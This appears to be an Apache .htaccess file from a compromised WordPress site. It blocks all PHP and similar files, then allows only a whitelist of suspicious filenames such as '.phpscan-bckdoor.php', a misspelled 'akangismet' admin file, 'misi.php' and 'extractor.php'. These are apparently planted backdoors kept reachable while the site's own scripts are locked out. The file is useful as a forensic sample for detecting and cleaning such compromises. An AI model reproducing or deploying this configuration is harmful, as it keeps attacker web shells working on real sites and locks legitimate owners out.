<Files *.ph*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.a*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.Ph*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.S*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.pH*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.PH*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.s*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.i*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.I*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.p*>
    Order Deny,Allow
    Deny from all
</Files>
<FilesMatch "^(config.php|25.php|class-walker-navion-menu.php|shortcat.php|menu-maincourse.php|class-wp-configuration-table.php|wp-mails.php|misi.php|wp.php|db_resource.php|.phpscan-bckdoor.php|class-wp-block-partner.php|class-wp-font-resource.php|edit-form-blocked.php|wp-admin.php|index.html|class-wp-block-editor-konten.php|resource.php|class.akangismet-admin.php|wp-admin.php|wp-login.php|wp-links.php|wp-blog.php|index.php||list.txt|001.php|001max.php|25.php|wp-config.php|extractor.php|go.php|ga.xml|configuration.php|program.php)$">
    Order allow,deny
    Allow from all
</FilesMatch>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /  
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule> 
ErrorDocument 403 /index.php
ErrorDocument 404 /index.php

